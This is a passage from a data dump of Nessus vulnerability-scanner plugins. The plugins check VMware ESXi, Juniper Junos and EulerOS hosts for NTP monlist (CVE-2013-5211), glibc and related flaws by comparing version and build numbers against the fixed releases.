value:\"2014-0002\");\n script_xref(name:\"VMSA\", value:\"2015-0001\");\n\n script_name(english:\"ESXi 5.0 < Build 1749766 Multiple Vulnerabilities (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi 5.0 host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 5.0 prior to build 1749766. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the monlist feature in NTP. A remote\n attacker can exploit this flaw, using a specially\n crafted packet to load the query function in monlist, to\n conduct a distributed denial of service attack.\n (CVE-2013-5211)\n\n - An unspecified privilege escalation vulnerability exists\n that allows an attacker to gain host OS privileges or\n cause a denial of service condition by modifying a\n configuration file. (CVE-2014-8370)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2075521\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3054e515\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply patch ESXi500-201405001 for ESXi 5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\nif (\"VMware ESXi 5.0\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi 5.0\");\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) exit(1, 'Failed to extract the ESXi build number.');\n\nbuild = int(match[1]);\nfixed_build = 1749766;\n\nif (build < fixed_build)\n{\n if (report_verbosity > 0)\n {\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi\", ver - \"ESXi \" + \" build \" + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:08", "description": "The version of Junos OS installed on the remote host is affected by multiple vulnerabilities as referenced in the JSA11171 advisory.\n\n - The control mode (mode 6) functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to set or unset traps via a crafted control mode packet. (CVE-2016-9310)\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. (CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-04-15T00:00:00", "type": "nessus", "title": "Juniper Junos OS Multiple Vulnerabilities (JSA11171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-9310"], "modified": "2021-04-19T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA11171.NASL", "href": "https://www.tenable.com/plugins/nessus/148645", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148645);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/19\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-9310\");\n script_xref(name:\"JSA\", value:\"JSA11171\");\n\n script_name(english:\"Juniper Junos OS Multiple Vulnerabilities (JSA11171)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Junos OS installed on the remote host is affected by multiple vulnerabilities as referenced in the\nJSA11171 advisory.\n\n - The control mode (mode 6) functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to set or\n unset traps via a crafted control mode packet. (CVE-2016-9310)\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1\n requests, as exploited in the wild in December 2013. (CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/JSA11171\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release referenced in Juniper advisory JSA11171\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9310\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\", \"Host/Juniper/model\");\n\n exit(0);\n}\n\ninclude('junos.inc');\n\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nif (model !~ \"^(EX|SRX)\")\n{\n audit(AUDIT_DEVICE_NOT_VULN, model);\n}\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\n\nvuln_ranges = [\n {'min_ver':'14.1X53', 'fixed_ver':'14.1X53-D53'},\n {'min_ver':'16.1', 'fixed_ver':'16.1R7-S6'},\n {'min_ver':'16.2', 'fixed_ver':'16.2R3'},\n {'min_ver':'17.1', 'fixed_ver':'17.1R2-S11'},\n {'min_ver':'17.2', 'fixed_ver':'17.2R1-S9'},\n {'min_ver':'17.3', 'fixed_ver':'17.3R2-S5'},\n {'min_ver':'17.4', 'fixed_ver':'17.4R2-S7'},\n {'min_ver':'18.1', 'fixed_ver':'18.1R3-S8'},\n {'min_ver':'18.2', 'fixed_ver':'18.2R2-S7'},\n {'min_ver':'18.3', 'fixed_ver':'18.3R1-S5'},\n {'min_ver':'18.4', 'fixed_ver':'18.4R1-S4'},\n {'min_ver':'19.1', 'fixed_ver':'19.1R1-S3'},\n {'min_ver':'19.2', 'fixed_ver':'19.2R1-S1'}\n];\nif (model =~ '^EX')\n{\n append_element(var:vuln_ranges, value:{'min_ver':'12.3', 'fixed_ver':'12.3R12-S15'});\n append_element(var:vuln_ranges, value:{'min_ver':'15.1', 'fixed_ver':'15.1R7-S6'});\n}\nif (model =~ '^SRX')\n{\n append_element(var:vuln_ranges, value:{'min_ver':'12.3X48', 'fixed_ver':'12.3X48-D95'});\n append_element(var:vuln_ranges, value:{'min_ver':'15.1X49', 'fixed_ver':'15.1X49-D190'});\n}\n\nfix = junos_compare_range(target_version:ver, vuln_ranges:vuln_ranges);\nif (empty_or_null(fix)) audit(AUDIT_INST_VER_NOT_VULN, 'Junos OS', ver);\nreport = get_report(ver:ver, fix:fix);\nsecurity_report_v4(severity:SECURITY_WARNING, port:0, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:35", "description": "The remote VMware ESX / ESXi host is affected by multiple vulnerabilities :\n\n - Multiple integer overflow conditions exist in the glibc package in file malloc/malloc.c. An unauthenticated, remote attacker can exploit these to cause heap memory corruption by passing large values to the pvalloc(), valloc(), posix_memalign(), memalign(), or aligned_alloc() functions, resulting in a denial of service. (CVE-2013-4332)\n\n - A distributed denial of service (DDoS) vulnerability exists in the NTP daemon due to improper handling of the 'monlist' command. A remote attacker can exploit this, via a forged request to an affected NTP server, to cause an amplified response to the intended target of the DDoS attack. (CVE-2013-5211)", "cvss3": {}, "published": "2015-12-30T00:00:00", "type": "nessus", "title": "VMware ESX / ESXi Multiple Vulnerabilities (VMSA-2014-0002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4332", "CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:4.0", "cpe:/o:vmware:esxi:4.1", "cpe:/o:vmware:esxi:5.0", "cpe:/o:vmware:esxi:5.1", "cpe:/o:vmware:esxi:5.5"], "id": "VMWARE_VMSA-2014-0002_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/87674", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87674);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-4332\",\n \"CVE-2013-5211\"\n );\n script_bugtraq_id(\n 62324,\n 64692\n );\n script_xref(name:\"VMSA\", value:\"2014-0002\");\n script_xref(name:\"CERT\", value:\"348126\");\n\n script_name(english:\"VMware ESX / ESXi Multiple Vulnerabilities (VMSA-2014-0002)\");\n script_summary(english:\"Checks the version and build numbers of the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX / ESXi host is affected by multiple\nvulnerabilities :\n\n - Multiple integer overflow conditions exist in the glibc\n package in file malloc/malloc.c. An unauthenticated,\n remote attacker can exploit these to cause heap memory\n corruption by passing large values to the pvalloc(),\n valloc(), posix_memalign(), memalign(), or\n aligned_alloc() functions, resulting in a denial of\n service. (CVE-2013-4332)\n\n - A distributed denial of service (DDoS) vulnerability\n exists in the NTP daemon due to improper handling of the\n 'monlist' command. A remote attacker can exploit this,\n via a forged request to an affected NTP server, to cause\n an amplified response to the intended target of the DDoS\n attack. (CVE-2013-5211)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0002\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000281.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 4.0 / 4.1 and ESXi version 4.0 / 4.1 / 5.0 /\n5.1 / 5.5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.5\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\nesx = '';\n\nif (\"ESX\" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX/ESXi\");\n\nextract = eregmatch(pattern:\"^(ESXi?) (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX/ESXi\");\nelse\n{\n esx = extract[1];\n ver = extract[2];\n}\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"1682696\",\n \"4.1\", \"1682698\",\n \"5.0\", \"1749766\",\n \"5.1\", \"1743201\",\n \"5.5\", \"1623387\"\n );\n\nfull_fixes = make_array(\n \"5.0\", \"1851670\",\n \"5.1\", \"1743533\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\nfull_fix = FALSE;\nfull_fix = full_fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESXi?.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware \" + esx, ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif(!fix)\n audit(AUDIT_INST_VER_NOT_VULN, esx, ver, build);\n\nif (build < fix)\n{\n if (full_fix)\n fix = fix + \" / \" + full_fix;\n\n if (report_verbosity > 0)\n {\n report = '\\n Version : ' + esx + \" \" + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else\n security_warning(port:port);\n\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:01", "description": "The remote VMware ESXi host is version 5.5 prior to build 1623387. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple integer overflow conditions exist in the bundled GNU C Library (glibc) due to improper validation of user-supplied input. A remote attacker can exploit these issues to cause a buffer overflow, resulting in a denial of service condition. (CVE-2013-4332)\n\n - A flaw exists in the monlist feature in NTP. A remote attacker can exploit this flaw, using a specially crafted packet to load the query function in monlist, to conduct a distributed denial of service attack.\n (CVE-2013-5211)", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "nessus", "title": "ESXi 5.5 < Build 1623387 Multiple Vulnerabilities (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4332", "CVE-2013-5211"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/o:vmware:esxi", "cpe:/a:ntp:ntp", "cpe:/a:gnu:glibc"], "id": "VMWARE_ESXI_5_5_BUILD_1623387_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/83781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83781);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/08/06 14:03:15\");\n\n script_cve_id(\"CVE-2013-4332\", \"CVE-2013-5211\");\n script_bugtraq_id(62324, 64692);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"VMSA\", value:\"2014-0002\");\n\n script_name(english:\"ESXi 5.5 < Build 1623387 Multiple Vulnerabilities (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi 5.5 host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 5.5 prior to build 1623387. It\nis, therefore, affected by multiple vulnerabilities :\n\n - Multiple integer overflow conditions exist in the\n bundled GNU C Library (glibc) due to improper validation\n of user-supplied input. A remote attacker can exploit\n these issues to cause a buffer overflow, resulting in a\n denial of service condition. (CVE-2013-4332)\n\n - A flaw exists in the monlist feature in NTP. A remote\n attacker can exploit this flaw, using a specially\n crafted packet to load the query function in monlist, to\n conduct a distributed denial of service attack.\n (CVE-2013-5211)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2065826\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5842205d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply patch ESXi550-201403101-SG for ESXi 5.5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:glibc\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\nif (\"VMware ESXi 5.5\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi 5.5\");\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) exit(1, 'Failed to extract the ESXi build number.');\n\nbuild = int(match[1]);\nfixed_build = 1623387;\n\nif (build < fixed_build)\n{\n if (report_verbosity > 0)\n {\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi\", ver - \"ESXi \" + \" build \" + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:30", "description": "a. DDoS vulnerability in NTP third-party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the 'monlist' command. An attacker may send a forged request to a vulnerable NTP server resulting in an amplified response to the intended target of the DDoS attack. Mitigation\n\n Mitigation for this issue is documented in VMware Knowledge Base article 2070193. This article also documents when vSphere products are affected.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5211 to this issue.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-4332 to this issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45 Oracle JRE is updated to version JRE 1.7 Update 45, which addresses multiple security issues that existed in earlier releases of Oracle JRE. \n\n Oracle has documented the CVE identifiers that are addressed in JRE 1.7.0 update 45 in the Oracle Java SE Critical Patch Update Advisory of October 2013. The References section provides a link to this advisory.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "nessus", "title": "VMSA-2014-0002 : VMware vSphere updates to third-party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4332", "CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:4.0", "cpe:/o:vmware:esxi:4.1", "cpe:/o:vmware:esxi:5.0", "cpe:/o:vmware:esxi:5.1", "cpe:/o:vmware:esxi:5.5"], "id": "VMWARE_VMSA-2014-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/72958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2014-0002. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72958);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-4332\", \"CVE-2013-5211\");\n script_bugtraq_id(61310, 62324, 63079, 63082, 63089, 63095, 63098, 63101, 63102, 63103, 63106, 63110, 63111, 63112, 63115, 63118, 63120, 63121, 63122, 63124, 63126, 63127, 63128, 63129, 63130, 63131, 63132, 63133, 63134, 63135, 63136, 63137, 63139, 63140, 63141, 63142, 63143, 63144, 63145, 63146, 63147, 63148, 63149, 63150, 63151, 63152, 63153, 63154, 63155, 63156, 63157, 63158, 64692);\n script_xref(name:\"VMSA\", value:\"2014-0002\");\n\n script_name(english:\"VMSA-2014-0002 : VMware vSphere updates to third-party libraries\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. DDoS vulnerability in NTP third-party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the\n 'monlist' command. An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack. \n \n Mitigation\n\n Mitigation for this issue is documented in VMware Knowledge Base\n article 2070193. This article also documents when vSphere \n products are affected.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2013-5211 to this issue.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version\n glibc-2.5-118.el5_10.2 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2013-4332 to this issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n \n Oracle JRE is updated to version JRE 1.7 Update 45, which\n addresses multiple security issues that existed in earlier\n releases of Oracle JRE. \n\n Oracle has documented the CVE identifiers that are addressed\n in JRE 1.7.0 update 45 in the Oracle Java SE Critical Patch \n Update Advisory of October 2013. The References section provides\n a link to this advisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2014/000281.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2014-03-11\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 4.0\", patch:\"ESX400-201404402-SG\")) flag++;\n\nif (esx_check(ver:\"ESX 4.1\", patch:\"ESX410-201404402-SG\")) flag++;\n\nif (esx_check(ver:\"ESXi 4.0\", patch:\"ESXi400-201404401-SG\")) flag++;\n\nif (esx_check(ver:\"ESXi 4.1\", patch:\"ESXi410-201404401-SG\")) flag++;\n\nif (esx_check(ver:\"ESXi 5.0\", vib:\"VMware:tools-light:5.0.0-3.47.1749766\")) flag++;\n\nif (esx_check(ver:\"ESXi 5.1\", vib:\"VMware:esx-base:5.1.0-2.27.1743201\")) flag++;\nif (esx_check(ver:\"ESXi 5.1\", vib:\"VMware:esx-tboot:5.1.0-2.23.1483097\")) flag++;\nif (esx_check(ver:\"ESXi 5.1\", vib:\"VMware:misc-drivers:5.1.0-2.23.1483097\")) flag++;\n\nif (esx_check(ver:\"ESXi 5.5\", vib:\"VMware:esx-base:5.5.0-0.14.1598313\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:esx_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:59:22", "description": "According to the versions of the ntp packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-05-01T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : ntp (EulerOS-SA-2020-1547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": 